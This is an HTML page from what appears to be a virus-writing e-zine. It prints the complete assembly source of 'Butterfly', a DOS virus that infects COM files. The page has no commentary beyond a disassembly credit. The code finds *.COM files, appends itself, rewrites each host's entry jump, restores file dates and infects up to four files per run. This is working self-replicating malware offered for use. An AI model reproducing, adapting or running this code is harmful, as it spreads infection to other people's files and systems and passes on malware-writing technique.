<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>BUTTRFLY</strong></font></p>

<p align="left"><font color="#00FFFF" size="3"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind<br>
</strong></font><font color="#00FFFF" size="3"><strong>;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.code<br>
org 100h<br>
<br>
start:<br>
jmp virus<br>
nop<br>
nop<br>
<br>
oldjmp db 0cdh<br>
newjmp db 20h<br>
db 90h <br>
id db 1<br>
virus:<br>
call delta<br>
delta:<br>
pop bp<br>
sub bp,10Bh<br>
mov di,100h <br>
lea si,[bp+oldjmp]<br>
mov cx,4<br>
cld <br>
rep movsb<br>
<br>
mov ah,1Ah<br>
lea dx,[bp+dta]<br>
int 21h<br>
<br>
mov byte ptr [bp+offset counter],0<br>
<br>
mov ah,4Eh<br>
lea si,[bp+dta+1eh] <br>
lea dx,[bp+fspec] <br>
push dx <br>
jmp short findfiles<br>
<br>
returntohost:<br>
mov ah,1Ah <br>
mov dx,80h <br>
int 21h<br>
<br>
xor ax,ax<br>
xor bx,bx <br>
xor cx,cx<br>
xor dx,dx<br>
xor si,si<br>
xor di,di<br>
mov sp,0FFFEh <br>
mov bp,100h <br>
push bp<br>
xor bp,bp <br>
retn <br>
<br>
closeup:<br>
or bx,bx <br>
jz findnext <br>
<br>
mov ch,0 <br>
mov cl,[bp+dta+15h]<br>
<br>
mov ax,5701h <br>
mov cx,word ptr [bp+dta+16h]<br>
mov dx,word ptr [bp+dta+18h]<br>
int 21h<br>
<br>
mov ah,3Eh <br>
int 21h<br>
xor bx,bx <br>
<br>
findnext:<br>
mov ah,4Fh <br>
<br>
findfiles:<br>
pop dx<br>
push dx<br>
mov cx,7<br>
xor bx,bx <br>
int 21h<br>
<br>
jnc infect <br>
jmp returntohost2<br>
<br>
vname db 0FFh<br>
db 'Goddamn Butterflies'<br>
db 0FFh<br>
<br>
infect:<br>
mov dx,si<br>
<br>
mov ax,3D02h<br>
int 21h<br>
jc closeup<br>
mov bx,ax<br>
<br>
mov ah,3Fh<br>
mov cx,4 <br>
lea dx,[bp+oldjmp]<br>
int 21h<br>
<br>
mov ax,word ptr [bp+dta+23h]<br>
cmp ax,444Eh <br>
je closeup<br>
<br>
cmp [bp+id],1<br>
je closeup<br>
<br>
mov ax,word ptr [bp+dta+1ah]<br>
cmp ax,121<br>
jb closeup<br>
mov ax,4202h <br>
cwd<br>
xor cx,cx<br>
int 21h<br>
<br>
cmp ax,64768<br>
ja closeup<br>
<br>
mov [bp+data],ax<br>
lea dx,[bp+oldjmp]<br>
mov cx,4<br>
mov ah,40h<br>
int 21h<br>
<br>
lea dx,[bp+virus]<br>
mov cx,12Ah<br>
mov ah,40h<br>
int 21h<br>
<br>
mov ax,4200h<br>
cwd<br>
xor cx,cx<br>
int 21h<br>
<br>
mov ax,[bp+data]<br>
inc ax <br>
mov word ptr [bp+newjmp],ax<br>
mov [bp+oldjmp],0E9h <br>
mov [bp+id],1<br>
<br>
lea dx,[bp+oldjmp] <br>
mov ah,40h<br>
mov cx,4<br>
int 21h<br>
<br>
inc [bp+counter]<br>
cmp [bp+counter],4 <br>
jae returntohost3<br>
jmp closeup<br>
<br>
returntohost2:<br>
mov di,100h<br>
cmp word ptr [di],20CDh<br>
je returntohost3<br>
<br>
returntohost3:<br>
jmp returntohost<br>
<br>
fspec db '*.COM',0<br>
dta db 43 dup (0) <br>
counter db 0 <br>
data dw 0<br>
<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../Images/coollogo_com_21259199.jpg" border="0" width="518"
height="56"></a></p>
</body>
</html>
